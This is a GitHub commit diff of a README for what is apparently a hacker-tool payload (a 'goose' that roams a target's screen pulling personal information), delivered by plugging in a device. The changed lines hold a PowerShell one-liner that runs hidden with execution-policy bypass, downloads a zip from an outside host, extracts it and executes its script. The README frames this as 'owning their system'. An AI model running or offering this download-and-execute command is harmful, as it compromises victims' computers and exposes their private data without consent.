Update ReadMe.md

This commit is contained in:
I-Am-Jakoby 2023-03-25 05:46:34 -05:00 committed by GitHub
parent d9a8f07de5
commit aa37fe79d7
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -41,7 +41,7 @@ Afterwards it will walk around your targets screen pulling out personal informat
* Plug in your device * Plug in your device
* 10 seconds later your goose is owning their system * 10 seconds later your goose is owning their system
``` ```powershell
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1" powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
``` ```
### Exiting the Payload ### Exiting the Payload